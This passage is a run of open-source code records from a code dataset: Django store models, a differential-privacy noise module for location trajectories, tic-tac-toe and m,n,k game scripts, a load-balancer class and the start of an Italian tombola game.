models.CharField(\n    #     max_length=150,\n    #     null=False,\n    #     verbose_name='Электронная почта')\n    phone = models.CharField(\n        max_length=150,\n        null=False,\n        verbose_name='Телефон номер')\n    address = models.TextField(\n        max_length=150,\n        null=False,\n        verbose_name='Адрес')\n    # city = 
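# A quick check of the save() override above: django.utils.text.slugify()
# strips non-ASCII by default, so Cyrillic names like the verbose_name values
# in these models would produce an empty slug unless allow_unicode=True is
# passed (requires Django installed; the values here are toy examples).
from django.utils.text import slugify

assert slugify("New Arrivals 2023") == "new-arrivals-2023"
assert slugify("Обувь") == ""                           # non-ASCII dropped
assert slugify("Обувь", allow_unicode=True) == "обувь"  # keep Unicode letters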
models.CharField(max_length=150, null=False, verbose_name='Город')\n # state = models.CharField(\n # max_length=150,\n # null=False,\n # verbose_name='Область')\n # country = models.CharField(\n # max_length=150,\n # null=False,\n # verbose_name='Страна')\n total_price = models.FloatField(null=False, verbose_name='Итоговая цена')\n payment_method = models.CharField(\n max_length=200, verbose_name='Способ доставки')\n tracking_no = models.CharField(\n null=True,\n max_length=150,\n verbose_name='Номер отслеживания')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n updated_at = models.DateTimeField(auto_now=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Заказ'\n verbose_name_plural = 'Заказы'\n\n def __str__(self):\n return '{} - {}'.format(self.id, self.tracking_no)\n\n\nclass OrderItem(models.Model):\n order = models.ForeignKey(\n Order,\n on_delete=models.CASCADE,\n verbose_name='Заказ')\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n verbose_name='Товар')\n price = models.FloatField(null=False, verbose_name='Цена')\n quantity = models.PositiveIntegerField(\n null=False, verbose_name='Количество')\n size = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n verbose_name='Размер товара')\n created_at = models.DateTimeField(\n verbose_name='Дата',\n auto_now=True,\n auto_now_add=False)\n\n def __str__(self):\n return '{} - {}'.format(self.order.id, self.order.tracking_no)\n\n\n class Meta:\n verbose_name = 'Заказанный товар'\n verbose_name_plural = 'Заказанный товары'\n\nclass Order_product(models.Model):\n user = models.ForeignKey(to=User, on_delete=models.CASCADE)\n product_name = models.ForeignKey(Product, on_delete=models.CASCADE)\n size = models.PositiveIntegerField()\n quantity = models.PositiveIntegerField(default=1)\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n verbose_name='Пользователь')\n phone = models.CharField(\n max_length=150,\n null=False,\n verbose_name='Телефон номер')\n address = models.TextField(null=False, verbose_name='Адрес')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Профиль'\n verbose_name_plural = 'Профили'\n\n def __str__(self):\n return self.user.username\n\n def get_rating(self):\n rating = Rating.objects.filter(client=self).aggregate(\n Avg('rating'))['rating__avg']\n return rating\n\n\nclass Сarousel(models.Model):\n name = models.CharField(max_length=150, verbose_name='Карусель', blank=False)\n image = models.ImageField(verbose_name='Image', upload_to='advertisement/')\n created_at = models.DateTimeField(\n verbose_name='Дата',\n auto_now=True,\n auto_now_add=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = 'advertisement_product'\n verbose_name = 'Карусель'\n verbose_name_plural = 'Карусели'\n\n\nclass Contacts(models.Model):\n name = models.CharField(max_length=150, verbose_name='Имя', null=False)\n gmail = models.CharField(max_length=150, verbose_name='Е-мейл', null=False)\n number = models.CharField(\n max_length=150,\n verbose_name='Телефон',\n null=False)\n message = models.CharField(\n max_length=150,\n verbose_name='Сообщение',\n null=False)\n created_at = models.DateTimeField(\n verbose_name='Дата',\n auto_now=True,\n auto_now_add=False)\n\n class Meta:\n verbose_name = 'Контакт'\n verbose_name_plural = 'Контакты'\n\n\nclass news_email(models.Model):\n email = models.CharField(max_length=150, verbose_name='Е-мейл', 
null=False)\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Новый емайл'\n verbose_name_plural = 'Новые емайлы'\n\n\nclass Profit(models.Model):\n report_per_day = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один день')\n report_per_week = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за одну неделю')\n report_per_month = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один месяц')\n report_per_season = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один сезон')\n report_per_year = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один год')\n report_per_all = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Все прибыли')\n\n class Meta:\n verbose_name = 'Прибыль'\n verbose_name_plural = 'Прибыли'\n\n\nclass GoodsSold(models.Model):\n name_of_products = models.CharField(\n max_length=255, verbose_name='Имя товара')\n how_many_times_sold = models.CharField(\n max_length=255, verbose_name='Сколько раз продано')\n item_size = models.CharField(max_length=255, verbose_name='Размер товара')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Проданный товар'\n verbose_name_plural = 'Проданные товары'\n\n\nclass Rating(models.Model):\n name_of_clients = models.CharField(\n null=False, max_length=255, verbose_name='Имя клиента')\n total_price = models.PositiveIntegerField(\n null=False, verbose_name='Сумма покупки')\n\n class Meta:\n verbose_name = 'Рейтинг'\n verbose_name_plural = 'Рейтинги'\n","repo_name":"abdullaev012/maasy_kg","sub_path":"store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12088048233","text":"#!/usr/bin/env python3\n# ------------------------------------------------------------------------------\n# Author: Erik Buchholz\n# E-mail: e.buchholz@unsw.edu.au\n# ------------------------------------------------------------------------------\n\"\"\"\nContains methods for the addition of Laplace noise.\n\nBelow, Jiang2013 refers to the following paper:\n\nJiang K, Shao D, Bressan S, Kister T, Tan K-L. Publishing trajectories with differential privacy guarantees.\nIn: Proceedings of the 25th International Conference on Scientific and Statistical Database Management - SSDBM.\nACM Press; 2013:1. 
doi:10.1145/2484838.2484846\n\n\"\"\"\nimport logging\nfrom typing import Union, Iterable, List, Callable, Any\n\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as st\nfrom tqdm import tqdm\n\nfrom raopt.preprocessing.coordinates import latlon_to_xy, xy_to_latlon, check_coordinate_range\nfrom raopt.utils.helpers import get_latlon_arrays, set_latlon\n\n# -----------------------------CONSTANTS---------------------------------------\nSDD_THRESHOLD = 1000 # How many random numbers before giving up\n# -----------------------------CONSTANTS---------------------------------------\n\nlog = logging.getLogger()\n\n\ndef add_laplace_to_value(v: Union[float, Iterable[float]], mean: float, scale: float) -> Any:\n \"\"\"\n Add laplace noise to a single float value or a list of floats.\n :param v: Values to add noise to.\n :param mean: Mean value of distribution\n :param scale: Scale of distribution\n :return: The noised value(s)\n \"\"\"\n n = None\n if hasattr(v, \"__len__\"):\n n = len(v)\n return v + np.random.laplace(mean, scale, n)\n\n\ndef diff_private_laplace(\n v: Union[float, Iterable[float]], epsilon: float, sensitivity: float) -> Union[float, Iterable[float]]:\n \"\"\"\n Add laplace noise in order to achieve differential privacy.\n :param v: Value(s) to add noise to\n :param epsilon: Differential Privacy Parameter\n :param sensitivity: Sensitivity of Function\n :return: Noisy values\n \"\"\"\n return add_laplace_to_value(v, 0, sensitivity / epsilon)\n\n\ndef sphere_sampling(n: int, r: float) -> List[float]:\n \"\"\"\n See: Jiang2013\n\n :param n: Dimension\n :param r: Radius\n :return: Sampled point in R^n\n \"\"\"\n x = np.random.normal(0, 1, n)\n w = np.sqrt(np.sum(np.square(\n x\n )))\n z = r / w * x\n return z\n\n\ndef gnoise(\n x: np.ndarray, y: np.ndarray, epsilon: float, delta: float, M: float\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement global noise (GNoise) according to Jiang2013.\n Except, we add noise to all positions including start and end point.\n\n Note: epsilon-DP cannot be achieved\n\n :param x: x coordinates of trajectory\n :param y: y coordinates of trajectory\n :param epsilon: Differential Privacy Parameter\n :param delta: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n \"\"\"\n check_coordinate_range(x, y)\n assert len(x) == len(y)\n n = len(x)\n log.debug(f\"GNoise - Using M = {round(M)}m.\")\n\n if delta >= 1:\n log.error(\"Delta has to be smaller than one!\")\n raise RuntimeError(\"Delta has to be smaller than one!\")\n\n b = (2 * M / epsilon) + (2 * M / epsilon) * \\\n (2 * n - 1) * (1 / np.log(1. / (1. 
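# Empirical sanity check for diff_private_laplace() above: with scale
# b = sensitivity / epsilon, Laplace(0, b) noise has standard deviation
# sqrt(2) * b (toy values; assumes numpy is available).
import numpy as np

sensitivity, epsilon = 100.0, 0.5
b = sensitivity / epsilon
noise = np.random.laplace(0, b, size=200_000)
assert abs(noise.std() / (np.sqrt(2) * b) - 1) < 0.05  # within sampling error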
- delta)))\n\n log.debug(f\"GNoise: b = {b}\")\n\n # Sample noise\n r = np.random.exponential(b)\n\n z = sphere_sampling(2 * n, r)\n alpha = [z[i] for i in range(len(z)) if i % 2 == 0]\n beta = [z[i] for i in range(len(z)) if i % 2 == 1]\n\n assert alpha != beta\n assert len(alpha) == len(beta)\n assert len(alpha) == n\n\n # Add Noise\n res_x = x + alpha\n res_y = y + beta\n\n return res_x, res_y\n\n\ndef pnoise(\n x: np.ndarray, y: np.ndarray, epsilon: float, delta: float, M: float\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement point noise (PNoise) according to Jiang2013.\n Except, we add noise to all positions including start and end point.\n\n Note: epsilon-DP cannot be achieved\n\n :param x: x coordinates of trajectories\n :param y: y coordinates of trajectories\n :param epsilon: Differential Privacy Parameter\n :param delta: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n \"\"\"\n check_coordinate_range(x, y)\n assert len(x) == len(y)\n n = len(x)\n log.debug(f\"PNoise - Using M = {round(M)}m.\")\n\n if delta >= 1:\n log.error(\"Delta has to be smaller than one!\")\n raise RuntimeError(\"Delta has to be smaller than one!\")\n\n b = 2 * M / epsilon + 2 * M / (epsilon * np.log(1 / (1 - delta)))\n\n log.debug(f\"PNoise: b = {b}\")\n\n # Sample noise\n alpha, beta = [], []\n\n r = np.random.exponential(b, size=n)\n\n for i in range(n):\n z = sphere_sampling(2, r[i])\n alpha.append(z[0])\n beta.append(z[1])\n\n assert alpha != beta\n assert len(alpha) == len(beta)\n assert len(alpha) == n\n\n # Add Noise\n res_x = x + alpha\n res_y = y + beta\n\n return res_x, res_y\n\n\ndef cnoise(\n x: np.ndarray, y: np.ndarray, epsilon: float, M: float\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement coordinate noise (CNoise) according to Jiang2013.\n Except, we add noise to all positions including start and end point.\n\n Note: epsilon-DP CAN be achieved\n\n :param x: x coordinates of trajectories\n :param y: y coordinates of trajectories\n :param epsilon: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n \"\"\"\n check_coordinate_range(x, y)\n assert len(x) == len(y)\n n = len(x)\n log.debug(f\"CNoise - Using M = {round(M)}m.\")\n\n b = 2 * np.sqrt(2) * M / epsilon\n\n log.debug(f\"CNoise: b = {b}\")\n\n # Sample noise\n alpha = np.random.laplace(0, b, n)\n beta = np.random.laplace(0, b, n)\n\n assert len(alpha) == len(beta)\n assert len(alpha) == n\n\n # Add Noise\n res_x = x + alpha\n res_y = y + beta\n\n return res_x, res_y\n\n\ndef _compute_C(a: float, B: float, eps: float) -> float:\n \"\"\"Compute the C value from Jiang2013\"\"\"\n if a < B:\n C_inv = (8 * B / eps) * (\n 2 - np.exp(- a * eps / (8 * B)) -\n np.exp(- eps * (B - a) / (8 * B))\n )\n else:\n C_inv = 8 * B / eps * \\\n (np.exp(- (a - B) * eps / (8 * B)) - np.exp(- eps * a / (8 * B)))\n return 1.0 / C_inv\n\n\ndef get_exp_pdf(C: float, a: float, B: float, eps: float) -> Callable:\n def pdf(x):\n return C * np.exp(- eps * abs(x - a) / (8 * B))\n\n return pdf\n\n\ndef exponential_mechanism(a: float, B: float, eps: float) -> st.rv_continuous:\n \"\"\"\n Return the distribution to sample from.\n Sample with my_cv.rvs(size=1).\n\n :param a: lower bound (positive)\n :param B: upper bound (positive)\n :param eps: Epsilon differential private parameter\n :return:\n \"\"\"\n\n # Compute C\n C = _compute_C(a, B, eps)\n\n 
pdf = get_exp_pdf(C, a, B, eps)\n\n class my_pdf(st.rv_continuous):\n # noinspection PyMethodOverriding\n def _pdf(self, x):\n return pdf(x)\n\n my_cv: st.rv_continuous = my_pdf(a=0, b=B, name='PDF Dist')\n\n # Sampling:\n # sample = my_cv.rvs(size=1)[0]\n\n return my_cv\n\n\ndef unit_vector(v: np.array) -> float:\n \"\"\" Returns the unit vector of the v. \"\"\"\n return v / np.linalg.norm(v)\n\n\ndef angle_between(v1, v2):\n \"\"\" Returns the angle in radians between vectors 'v1' and 'v2'::\n\n >>> angle_between((1, 0, 0), (0, 1, 0))\n 1.5707963267948966\n >>> angle_between((1, 0, 0), (1, 0, 0))\n 0.0\n >>> angle_between((1, 0, 0), (-1, 0, 0))\n 3.141592653589793\n \"\"\"\n v1_u = unit_vector(v1)\n v2_u = unit_vector(v2)\n return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))\n\n\nclass StuckException(RuntimeError):\n \"\"\"Raise if SDD mechanism gets stuck\"\"\"\n\n\ndef _sdd_step(prev: np.ndarray, destination: np.ndarray, epsilon: float, M: float,\n n: int, i: int, endpoint: np.ndarray, abort_if_stuck=True) -> np.ndarray:\n v = destination - prev\n r_i = np.linalg.norm(v)\n angle = angle_between(destination, prev)\n roh_gen = exponential_mechanism(r_i, M, epsilon)\n alpha_gen = exponential_mechanism(angle, 2 * np.pi, epsilon)\n trials = 0\n guesses = {}\n while True:\n trials += 1\n roh = roh_gen.rvs(size=1)[0]\n alpha = alpha_gen.rvs(size=1)[0]\n new = prev + np.array((roh * np.cos(alpha), roh * np.sin(alpha)))\n distance = np.linalg.norm(new - endpoint)\n if distance <= (n + 1 - i) * M:\n return new\n else:\n guesses[distance] = new\n if trials > SDD_THRESHOLD:\n # Stuck\n if abort_if_stuck:\n raise StuckException(\n f\"SDD mechanism is stuck at i = {i}. \"\n f\"Allowed Distance: {n + 1 - i}M, \"\n f\"Current Distance: {round(np.linalg.norm(new - endpoint) / M, 2)}M\")\n else:\n # Just use the best value, violates definition of SDD\n value = guesses[min(guesses.keys())]\n dist = np.linalg.norm(value - endpoint) / M\n log.warning(\n f'Using a value violating line 11 '\n f'(Distance: {round(dist, 2)}M vs {round(n + 1 - i, 2)}M) for i = {i}')\n return value\n\n\ndef sdd(\n x: np.ndarray,\n y: np.ndarray,\n epsilon: float,\n M: float,\n noisy_endpoints: bool = True,\n show_progress=False,\n enforce_line11=False\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement the SDD mechanism from Jiang2013.\n Except, we add noise to all positions including start and end point, if the flag is set.\n\n Note: epsilon-DP CAN be achieved\n\n :param x: x coordinates of trajectories\n :param y: y coordinates of trajectories\n :param epsilon: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :param noisy_endpoints: If start and endpoint should be modified\n :param show_progress: Display progressbar\n :param enforce_line11: Restart until proper noise is found\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n :raises StuckException: If line 11 (in the paper) cannot be satisfied after a certain threshold\n \"\"\"\n # Check coordinate type\n check_coordinate_range(x, y) # Check if lat/lon or meters is used\n assert len(x) == len(y) # Verify that x and y belong together\n\n n = len(x)\n # In the paper, the indices start at 0 and end at n + 1. 
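# Numerical sanity check for exponential_mechanism() above: the constant from
# _compute_C() should normalise C * exp(-eps*|x - a|/(8B)) over [0, B].
# The a < B branch is re-derived inline so this snippet runs standalone
# (toy values; assumes numpy is available).
import numpy as np

a_v, B_v, eps_v = 3.0, 10.0, 1.0
C_inv = (8 * B_v / eps_v) * (2 - np.exp(-a_v * eps_v / (8 * B_v))
                               - np.exp(-eps_v * (B_v - a_v) / (8 * B_v)))
xs = np.linspace(0.0, B_v, 100_001)
pdf_vals = (1.0 / C_inv) * np.exp(-eps_v * np.abs(xs - a_v) / (8 * B_v))
integral = ((pdf_vals[:-1] + pdf_vals[1:]) * np.diff(xs)).sum() / 2  # trapezoid rule
assert abs(integral - 1.0) < 1e-3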
Main loop goes from 1 to n only.\n    alg_n = n - 2\n\n    log.debug(f\"SDD - Using M = {round(M)}m.\")\n\n    # The algorithm can get stuck at line 11\n    # For proper result, we cannot return a value, in this case.\n    # It is unclear why this is not a problem in the paper.\n    # We assume that they only tested the mechanism on short trajectories,\n    # and the problem only occurs for longer ones.\n    abort_if_stuck = enforce_line11\n\n    # Result array\n    res_x, res_y = np.zeros(n), np.zeros(n)\n\n    startpoint = np.array((x[0], y[0]))\n    res_x[0], res_y[0] = startpoint\n    endpoint = np.array((x[-1], y[-1]))\n    res_x[-1], res_y[-1] = endpoint\n    log.debug(f\"Startpoint: {str(startpoint)}, Endpoint: {str(endpoint)}\")\n\n    loop = range(1, n - 1)\n    if show_progress:\n        loop = tqdm(loop, leave=True, ncols=120)\n\n    for i in loop:\n        orig = np.array((x[i], y[i]))\n        prev = np.array((res_x[i - 1], res_y[i - 1]))\n        new = _sdd_step(prev=prev, destination=orig, epsilon=epsilon, M=M, n=alg_n, i=i,\n                        endpoint=endpoint, abort_if_stuck=abort_if_stuck)\n        res_x[i], res_y[i] = new\n\n    if noisy_endpoints:\n        # In case the flag is set, we also add noise to start and end point in the straightforward way\n        # Last Point\n        prev = np.array((res_x[-2], res_y[-2]))\n        new = _sdd_step(prev, endpoint, epsilon, M=M, n=n - 1, i=n - 1,\n                        endpoint=endpoint, abort_if_stuck=abort_if_stuck)\n        res_x[-1], res_y[-1] = new\n\n        # First Point\n        prev = np.array((res_x[1], res_y[1]))\n        new = _sdd_step(prev, startpoint, epsilon, M=M, n=alg_n, i=0,\n                        endpoint=endpoint, abort_if_stuck=abort_if_stuck)\n        res_x[0], res_y[0] = new\n\n    return res_x, res_y\n\n\ndef execute_mechanism(df: pd.DataFrame, mechanism: Callable, lat0: float, lon0: float,\n                      convert: bool = True,\n                      args: Iterable = (), kwargs: dict = {}) -> pd.DataFrame:\n    \"\"\"\n    Execute the given mechanism on the DataFrame.\n    :param df: Input DataFrame\n    :param mechanism: The mechanism to execute\n    :param lat0: For some conversion methods we need a reference latitude\n    :param lon0: For some conversion methods we need a reference longitude\n    :param convert: Convert coordinates to meter first\n    :param args: Other arguments for mechanism\n    :param kwargs: Other arguments for mechanism\n    :return:\n    \"\"\"\n    df = df.copy()\n    lat, lon = get_latlon_arrays(df)\n    if convert:\n        lat, lon = latlon_to_xy(lat, lon, lat0, lon0)\n    lat, lon = mechanism(lat, lon, *args, **kwargs)\n    if convert:\n        lat, lon = xy_to_latlon(lat, lon, lat0, lon0)\n    df = set_latlon(df, lat, lon)\n    return df\n","repo_name":"erik-buchholz/RAoPT","sub_path":"raopt/dp/sdd.py","file_name":"sdd.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"}
{"seq_id":"23956686008","text":"'''\n X | O | X\n---+---+---\n O | O | X \n---+---+---\n   | X |   \n'''\n\nimport random\n\n\ndef print_board_and_legend(board):\n    for i in range(3):\n        line1 = \" \" + board[i][0] + \" | \" + board[i][1] + \" | \" + board[i][2]\n        line2 = \" \" + str(3*i+1) + \" | \" + str(3*i+2) + \" | \" + str(3*i+3) \n        print(line1 + \" \"*5 + line2)\n        if i < 2:\n            print(\"---+---+---\" + \" \"*5 + \"---+---+---\")\n    \n    \n    \ndef make_empty_board():\n    board = []\n    for i in range(3):\n        board.append([\" \"]*3)\n    return board\n    \ndef spot_empty(square_num):\n    return board[(square_num - 1) // 3][(square_num-1)%3]==\" \"\ndef put_X_O():\n    global turn\n    choice = turn\n    return choice\ndef take_input():\n    print('Enter your move:')\n    square_num = input()\n    # input() returns a string in Python 3, so validate before converting\n    while not square_num.isdigit() or 
int(square_num) > 9 or int(square_num) < 1 or not spot_empty(int(square_num)):\n        print('Error, please re-enter:')\n        square_num = input()\n    square_num = int(square_num)\n    board[(square_num - 1) // 3][(square_num-1)%3]=put_X_O()\n    free_squares.remove([(square_num - 1) // 3, (square_num-1)%3])\ndef get_free_squares():\n    return free_squares\ndef make_random_move(board, mark):\n    position = free_squares[int(len(free_squares)*random.random())]\n    board[position[0]][position[1]]=mark\n    free_squares.remove(position)\ndef make_smart_move(board, mark):\n    # try every free square; if placing the mark there wins, keep it\n    for x, y in free_squares:\n        board[x][y]=mark\n        if is_win(board, turn):\n            free_squares.remove([x,y])\n            return\n        else:\n            board[x][y]=\" \"\n    # no immediate winning move: fall back to a random one\n    make_random_move(board, mark)\ndef is_row_all_marks(board, row_i, mark):\n    return board[row_i]==[mark, mark, mark]\ndef is_diagonal_all_marks(board, mark):\n    lr= (board[0][0]==board[1][1] and board[1][1]==mark and board[2][2]==mark) \n    rl= (board[2][0]==board[1][1] and board[1][1]==mark and board[0][2]==mark)\n    return rl or lr\ndef is_col_all_marks(board, col_i, mark):\n    return board[0][col_i]==mark and board[1][col_i]==mark and board[2][col_i]==mark\ndef is_win(board, mark):\n    for i in range(3):\n        if is_col_all_marks(board, i, mark): return True\n        if is_row_all_marks(board, i, mark): return True\n        if is_diagonal_all_marks(board, mark): return True\n    return False\n    \nif __name__ == '__main__':\n    global free_squares\n    free_squares=[[x,y] for x in range(3) for y in range (3)]\n    global board\n    board = make_empty_board()\n    global turn\n    turn = \"X\"\n    for i in range (9):\n        if i%2==0: take_input()\n        else: make_smart_move(board, put_X_O())\n        print_board_and_legend(board)\n        if is_win(board, turn): \n            print(turn,\"wins!\")\n            break\n        turn = turn ==\"X\" and \"O\" or \"X\"\n","repo_name":"Xiao215/ESC180","sub_path":"Lab6/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"21136150985","text":"\nclass Vector:\n\tdef __init__(this, x, y):\n\t\tthis.x = x\n\t\tthis.y = y\n\tdef __str__(this):\n\t\treturn '({}, {})'.format(this.x, this.y)\n\nclass Game:\n\tdef __init__(this, x, y, limit):\n\t\tthis.limit = limit\n\t\tthis.board = [['' for i in range(0, x)] for j in range(0, y)]\n\n\tdef has_winner(this):\n\t\tfor y in range(0, len(this.board)):\n\t\t\tfor x in range(0, len(this.board[y])):\n\t\t\t\tif this._consecutive_matches(Vector(x, y), None) == this.limit - 1:\n\t\t\t\t\treturn this.board[y][x]\n\t\treturn 'no winner found';\n\n\tdef _consecutive_matches(this, location, direction):\n\t\tif location.x == len(this.board[0]) or location.y == len(this.board):\n\t\t\treturn 0\n\t\telif direction is None:\n\t\t\thighest = 0\n\t\t\tfor direction in [Vector(-1,1),Vector(0,1),Vector(1,1),Vector(1,0)]:\n\t\t\t\tif this._is_match(location, direction):\n\t\t\t\t\tresult = this._consecutive_matches(Vector(location.x + direction.x, location.y + direction.y), direction) + 1\n\t\t\t\t\tif result > highest:\n\t\t\t\t\t\thighest = result\n\t\t\treturn highest\n\t\telif this._is_match(location, direction):\n\t\t\treturn this._consecutive_matches(Vector(location.x + direction.x, location.y + direction.y), direction) + 1\n\t\treturn 0\n\n\tdef _is_match(this, location, direction):\n\t\treturn (location.x + direction.x < len(this.board[0]) and\n\t\t\t\tlocation.y + direction.y < len(this.board) and\n\t\t\t\tthis.board[location.y][location.x] == this.board[location.y + direction.y][location.x + direction.x])\n\ngame = Game(5,4,4)\ngame.board = 
[['o','x','o','x','o'],\n\t\t\t ['x','x','x','o','o'],\n\t\t\t ['x','x','o','x','x'],\n\t\t\t ['o','o','o','x','o']]\nprint(game.has_winner())","repo_name":"KevinSShaffer/m-n-k","sub_path":"mnk.py","file_name":"mnk.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32017085398","text":"import logging\nimport threading\nimport time\nfrom ballast.discovery import ServerList\nfrom ballast.rule import Rule, RoundRobinRule\nfrom ballast.ping import (\n Ping,\n SocketPing,\n PingStrategy,\n SerialPingStrategy\n)\n\n\nclass LoadBalancer(object):\n\n DEFAULT_PING_INTERVAL = 30\n MAX_PING_TIME = 3\n\n def __init__(self, server_list, rule=None, ping_strategy=None, ping=None, ping_on_start=True):\n\n assert isinstance(server_list, ServerList)\n assert rule is None or isinstance(rule, Rule)\n assert ping_strategy is None or isinstance(ping_strategy, PingStrategy)\n assert ping is None or isinstance(ping, Ping)\n\n # some locks for thread-safety\n self._lock = threading.Lock()\n self._server_lock = threading.Lock()\n\n self._rule = rule \\\n if rule is not None \\\n else RoundRobinRule()\n\n self._ping_strategy = ping_strategy \\\n if ping_strategy is not None \\\n else SerialPingStrategy()\n\n self._ping = ping \\\n if ping is not None \\\n else SocketPing()\n\n self.max_ping_time = self.MAX_PING_TIME\n self._ping_interval = self.DEFAULT_PING_INTERVAL\n self._server_list = server_list\n self._servers = set()\n self._stats = LoadBalancerStats()\n self._rule.load_balancer = self\n self._logger = logging.getLogger(self.__module__)\n\n # start our background worker\n # to periodically ping our servers\n self._ping_timer_running = False\n self._ping_timer = None\n if ping_on_start:\n self._start_ping_timer()\n\n @property\n def ping_interval(self):\n return self._ping_interval\n\n @ping_interval.setter\n def ping_interval(self, value):\n self._ping_interval = value\n\n if self._ping_timer_running:\n self._stop_ping_timer()\n self._start_ping_timer()\n\n @property\n def max_ping_time(self):\n if self._ping is None:\n return 0\n return self._ping.max_ping_time\n\n @max_ping_time.setter\n def max_ping_time(self, value):\n if self._ping is not None:\n self._ping.max_ping_time = value\n\n @property\n def stats(self):\n return self._stats\n\n @property\n def servers(self):\n with self._server_lock:\n return set(self._servers)\n\n @property\n def reachable_servers(self):\n with self._server_lock:\n servers = set()\n for s in self._servers:\n if s.is_alive:\n servers.add(s)\n\n return servers\n\n def choose_server(self):\n\n # choose a server, will\n # throw if there are none\n server = self._rule.choose()\n\n return server\n\n def mark_server_down(self, server):\n self._logger.debug(\"Marking server down: %s\", server)\n server._is_alive = False\n\n def ping(self, server=None):\n if server is None:\n self._ping_all_servers()\n else:\n is_alive = self._ping.is_alive(server)\n server._is_alive = is_alive\n\n def ping_async(self, server=None):\n if server is None:\n # self._ping_all_servers()\n t = threading.Thread(name='ballast-worker', target=self._ping_all_servers)\n t.daemon = True\n t.start()\n else:\n is_alive = self._ping.is_alive(server)\n server._is_alive = is_alive\n\n def _ping_all_servers(self):\n with self._server_lock:\n results = self._ping_strategy.ping(\n self._ping,\n self._server_list\n )\n self._servers = set(results)\n\n def _start_ping_timer(self):\n\n with self._lock:\n if 
self._ping_timer_running:\n                self._logger.debug(\"Background pinger already running\")\n                return\n\n            self._ping_timer_running = True\n            self._ping_timer = threading.Thread(name='ballast-worker', target=self._ping_loop)\n            self._ping_timer.daemon = True\n            self._ping_timer.start()\n\n    def _stop_ping_timer(self):\n        with self._lock:\n            self._ping_timer_running = False\n            self._ping_timer = None\n\n    def _ping_loop(self):\n        while self._ping_timer_running:\n            try:\n                self._ping_all_servers()\n            except BaseException as e:\n                self._logger.error(\"There was an error pinging servers: %s\", e)\n\n            time.sleep(self._ping_interval)\n\n\nclass LoadBalancerStats(object):\n\n    def get_server_stats(self, server):\n        pass\n","repo_name":"thomasstreet/ballast","sub_path":"ballast/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"}
{"seq_id":"18591499934","text":"import Utils\nimport Tabellone\nimport Giocatori\nimport Regolamento\n\ntry:\n    parser = Utils.initialize_parser()\n    n_giocatori=parser.g\n    n_cartelle=parser.n\n    if n_cartelle==None or n_giocatori==None:\n        print('Digita -h per vedere gli argomenti sulla linea di comando')\n        exit()\n    if (Utils.numero_giocatori(n_giocatori)) and (Utils.confronta_lista_cartelle(n_giocatori,n_cartelle) and Utils.numero_cartelle(n_cartelle)): # check that the parameters passed by the user conform to what the program expects\n        '''In the preliminary phase of the game the cards are assigned to the players'''\n        lista_giocatori=[]\n        for i in range(n_giocatori):\n            giocatore=Giocatori.Giocatori(n_cartelle[i]) # each player gets the chosen number of cards\n            giocatore.assegnazione()\n            lista_giocatori.append(giocatore)\n        \n        \n\n        tabellone=Tabellone.Tabellone() # instantiate the board\n\n        '''Displays the cards assigned to the various players'''\n        for i in range(len(lista_giocatori)):\n            n=n_cartelle[i]\n            print('Giocatore ', i+1)\n            for j in range(n):\n                lista_giocatori[i].visualizza_cartella(j).stampa()\n\n        regole=Regolamento.Regolamento() # instantiate the rules\n\n        input(\"Iniziare il gioco della tombola?\")\n\n        estratti = list() # list holding all the drawn numbers\n        utlimi_estratti = list() # list holding only the last 6 drawn numbers\n        exitcond=False # becomes True when one of the players scores tombola\n        vincite=[0,1] # win detection is based on the number of '-1' entries on a card; the cases with zero '-1' or a single '-1' are excluded since they are not wins\n\n        while exitcond == False:\n            estratti= Utils.estrazione(estratti)\n            if len(utlimi_estratti)<=5: # while the list of drawn numbers has fewer than 6 items, just append the latest draw\n                utlimi_estratti.append(estratti[-1])\n            else:\n                utlimi_estratti.pop(0) # if the list already has 6 items, drop its first element before appending the new one\n                utlimi_estratti.append(estratti[-1])\n            \n            print('Gli ultimi estratti sono:',utlimi_estratti,'\\n\\n')\n\n            '''After each draw, check every card for the drawn number and, if present, replace it with -1 (by 